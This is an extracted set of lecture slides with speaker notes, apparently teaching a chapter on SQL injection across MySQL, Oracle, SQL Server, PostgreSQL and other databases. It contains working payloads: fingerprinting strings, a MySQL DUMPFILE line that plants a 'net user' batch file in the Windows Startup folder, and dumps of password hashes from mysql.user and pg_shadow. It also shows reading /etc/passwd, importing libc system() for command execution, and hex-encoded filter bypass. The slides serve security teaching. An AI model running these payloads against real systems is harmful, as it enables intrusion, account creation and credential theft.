16. identify the database For example … if we suspect that the database platform is either Microsoft SQL Server or Oracle ‘ AND ‘ ahmed’ || ‘ali’ = ‘ahmedali’-- ‘ AND ‘ahmed’ + ‘ali’ = ‘ahmedali’-- 2/04/2011 16 CHAPTER 10
17. Combining Multiple Rows only one column and one row can be returned at a time. To bypass this restriction it is possible to concatenate all rows and columns into a single string. 2/04/2011 17 CHAPTER 10
18.
19. Combining Multiple Rows SELECT sys.stragg (distinct username||';') FROM all_users; -- Returns all usernames on a single line 2/04/2011 19 CHAPTER 10
20. Cheat sheets a quick reference of common SQL statements used in SQL injection attacks against ORACLE and MySQL. 2/04/2011 20 CHAPTER 10
21. Cheat Sheet PHP and Ruby on Rails applications. Configuration Information and Schema 2/04/2011 21 CHAPTER 10
23. Attacking the Database Server System Command Execution It is possible to execute operating system commands by creating a malicious script file on the target server SELECT 'system_commands' INTO dumpfiletrojanpath SELECT 'net user x x ' into dumpfile 'c:Documents and SettingsAll UsersStart MenuPrograms Startupattack.bat' 2/04/2011 23 CHAPTER 10
24. Cracking Database Passwords extract user password hashes from the mysql.user table. SELECT concat(user,":",password) FROM mysql.user Password hashes can then be cracked using http://hashcrack.com/ www.openwall.com/john/ Attacking the Database Server 2/04/2011 24 CHAPTER 10
25. Attacking the Database Directly execute code by directly connecting to the MySQL server and creating a user-defined function. we can download a tool to perform this attack Windows: ww.scoobygang.org/HiDDenWarez/mexec.pl Windows:www.0xdeadbeef.info/exploits/raptor_winudf.tgz Attacking the Database Server 2/04/2011 25 CHAPTER 10
26. File Read/Write The MySQL LOAD_FILE function returns a string containing the contents of a specified file. The database user requires the file_priv privilege to invoke this function. SELECT LOAD_FILE('/etc/passwd'); - we can use a tool called SqlDumper to read file contents via blind SQL injection. Attacking the Database Server 2/04/2011 26 CHAPTER 10
30. Attacking the Database Server there are two different types of injection in ORACLE traditional SQL injection only a single SQL statement. PL/SQL injection execute entire PL/SQL blocks. 2/04/2011 30 CHAPTER 10
31. More than 100 Oracle tables contain password information. Sometimes the passwords are available as clear text. Cracking Database Passwords 2/04/2011 31 CHAPTER 10
34. Oracle password hashes can then be cracked using a variety of freely available tools, such as Woraauthbf. John the Ripper. Gsauditor. Checkpwd. Cain & Abel. 2/04/2011 CHAPTER 10 34 Cracking Database Passwords
36. Bypassing Input Validation Filters You can bypass input validation filters that rely on rejecting known bad characters and string literals by encoding your input. Quote Filters The single-quote character (‘) is synonymous with SQL injection attacks. The idea behind this approach is to prevent the attacker from breaking out of quote-delimited data. 2/04/2011 CHAPTER 10 36
38. Quote Filters (con…) Microsoft SQL Server also allows you to build your query within a variable and then call EXEC to execute it. SELECT ‘ABC’ into it via a HEX-encoded string: DECLARE @q varchar(8000) SELECT @q=0x53454c454354202741424327 EXEC(@q) You can use the following Perl script to automatically encode SQL statements using this technique: 2/04/2011 CHAPTER 10 38
40. HTTP Encoding You can sometimes bypass input validation filters that reject known bad characters (often referred to as blacklisting). 2/04/2011 CHAPTER 10 40
44. Troubleshooting SQL Injection Attacks: Table lists some of the common challenges and errors that are frequently encountered when attempting to exploit an SQL injection flaw across various platforms. 2/04/2011 CHAPTER 10 44
51. SQL Injection on Other Platforms. This section is intended to provide a quick reference for other, less commonplatforms, such as PostgreSQL, DB2, Informix, and Ingres. PostgreSQL : Extracting the PostgreSQL Database Configuration Information: 51 2/04/2011 CHAPTER 10
53. Blind Sql injection Function : Attacking the Database Server: PostgreSQL PostgreSQL does not offer a built-in procedure for executing operating system commands it is possible to import functions such as system() from an external .dll or Shared Object (.so) file. System Command Execution: import the system function from the standard UNIX libc library: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6‘,'system' LANGUAGE 'C' STRICT; The system function can then be called by executing the following SQL query: SELECT system('command'); 53 2/04/2011 CHAPTER 10
54. Local File Access: Local files can be read by the superuser account using the following SQL: CREATE TABLE filedata(t text); COPY filedata FROM '/etc/passwd'; -- It is also possible to write local files using the following SQL: CREATE TABLE thefile(evildata text); INSERT INTO thefile(evildata) VALUES ('some evil data'); COPY thefile (evildata) TO '/tmp/evilscript.sh'; Cracking Database Passwords : PostgreSQL passwords are hashed using the MD5 algorithm: select usename||':'||passwd from pg_shadow; 2/04/2011 CHAPTER 10 54
55. DB2 Cheat Sheet : The DB2 database server from IBM is perhaps one of the least popular database platforms to find integrated with a Web application. Extracting the PostgreSQL Database Configuration Information: 55 2/04/2011 CHAPTER 10
57. Informix Cheat Sheet : The Informix database server is distributed by IBM and is not commonly encountered when compared to other database platforms. Extracting the Informix Database Configuration Information: 2/04/2011 CHAPTER 10 57
59. Ingres Cheat Sheet : The Ingres database is an open source database available for all major operating systems.Ingres is one of the least popular databases to find integrated with a Web application. Extracting the Ingres Database Configuration Information: 59 2/04/2011 CHAPTER 10
61. Microsoft Access : Microsoft Access databases do not scale well with enterprise applications, and thereforeare usually encountered only when the application has minimal database requirements. Brett Moore of insomniasec.com has published an excellent paper on SQL injection with Microsoft Access which you can find here: www.insomniasec.com/publications/Access-Through- Access.pdf 2/04/2011 CHAPTER 10 61
62. Resources : SQL Injection White Papers ■ “Advanced SQL Injection” by Victor Chapela: www.owasp.org/index.php/Image:Advanced_SQL_Injection.ppt “Advanced SQL Injection in SQL Server Applications” by Chris Anley: www.ngssoftware.com/papers/advanced_sql_injection.pdf ■ “Buffer Truncation Abuse in .NET and Microsoft SQL Server” by GaryO’Leary-Steele: http://scanner.sec-1.com/resources/bta.pdf ■ “Access through Access” by Brett Moore: www.insomniasec.com/publications/Access-Through-Access.pdf ■ “Time-Based Blind SQL Injection with Heavy Queries” by Chema Alonso: http://technet.microsoft.com/en-us/library/cc512676.aspx SQL Injection Cheat Sheets ■ PentestMonkey.com SQL injection cheat sheets for Oracle, Microsoft SQL Server, MySQL, PostgreSQL, Ingres, DB2, and Informix: http://pentestmonkey.net/cheat-sheets/ ■ Michaeldaw.org SQL injection cheat sheets for Sybase, MySQL, Oracle, PostgreSQL, DB2, and Ingres: http://michaeldaw.org/sql-injection-cheat-sheet/ ■ FerruhMavituna cheat sheets for MySQL, SQL Server, PostgreSQL, and Oracle: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ ■ FerruhMavituna cheat sheets for Oracle: http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ 62 2/04/2011 CHAPTER 10
63. SQL Injection Exploit Tools : BSQL Hacker is a relatively new player in the SQL injection exploit world.The tool is a Windows-based GUI application that supports Microsoft SQL Server,Oracle, and MySQL. BSQL Hacker supports blind and error-based SQL injectiontechniques: http://labs.portcullis.co.uk/application/bsql-hacker/ The Sec-1 Automagic SQL injection (SASI) tool is a Microsoft SQL Server exploittool written in Perl: http://scanner.sec-1.com/resources/sasi.zip
65. Solutions Fast Track : Structured Query Language (SQL) Primer: SQL comprises a feature-rich set of statements, operators, and clauses designed to interact with a database server. The most common SQL Statements are SELECT,INSERT, UPDATE, DELETE, and DROP. The majority of SQL injection vulnerabilities occur when user-supplied data is included with the WHERE Clausem portion of a SELECT statement. The UPDATE and DELETE statements rely on a WHERE clause to determine which records are modified or deleted. When injecting SQL into either an UPDATE or a DELETE statement it is important to understand how your input could affect the database. Avoid injecting OR 1=1 or any other condition that returns true into either of these statements.
Editor's Notes
this will be valid for most database platforms. Where necessary I will highlight platform-specific variations to the standard
The primary role of the SELECT statement is to retrieve data from a database and return it to the application or user. Microsoft SQL server also allows you to use SELECT statements to read table data from one table and insert it into another. You use the UNION operator to combine the result sets of two or more SELECT statements. All SELECT statements within the union must return the same number of columns and their data type must be compatible. To permit duplicates and prevent the database from comparing the returned data, use UNION ALL SELECT
use the INSERT statement to insert data into a table . The most significant problem with this approachis that if the table structure is changed (e.g., columns are added or deleted) data could be written to the wrong column. use the UPDATE statement to modify existing data within a database table. all UPDATE statements should include a WHERE clause to indicate which rows should be updated,or all rows are affected.use the DELETE statement to delete rows from a table. all DELETE statements should include a WHERE clause to indicate which rows should be deleted.
use the DROP statement to delete database objects such as tables, views, indexes, users. use the CREATE TABLE statement to create a new table in the current database or schema.INTEGER or INT - A 32-bit signed integer value. Oracle allows you to create a table and populate it with data from another table or view: use the ORDER BY clause to sort the results of a SELECT statement by a specific column
You can use the ALTER TABLE statement to add, delete, or modify a column within an existing table. use the GROUP BY statement when performing an aggregate function such as SUM against a column in a table .
When performing SQL injection attacks you will often need to limit the number of table rows returned by your injected query (e.g., when extracting data via error messages). The syntax for selecting a specific row from a table varies among database platforms. Table details the SQL syntax for selecting the first and fifth rows from the tblUsers table.
محمد صديق يواصل
the single quote character is often filtered or doubled up as a defense mechanism. this strategy fails when the vulnerable user input is a numeric value, and therefore is not delimited using quote characters.
The DUAL Dummy table (as it is sometimes called) is an automatically-generated table assigned to SYS, but accessible to all users. It is useful because it always exists, and has a single row, which is handy for select statements with constant expressions. You could just as easily do this with any other table with a single row, but using DUAL makes it portable among all Oracle installations.Example: SELECT 1+1 FROM DUAL;1+1----------2
In the following example, we have created a variable named @qand placed the query SELECT ‘ABC’ into it via a HEX-encoded string
by encoding your input using exotic encoding standards or via double encoding.
In the Table lists common SQL metacharacters in a number of encoded formats.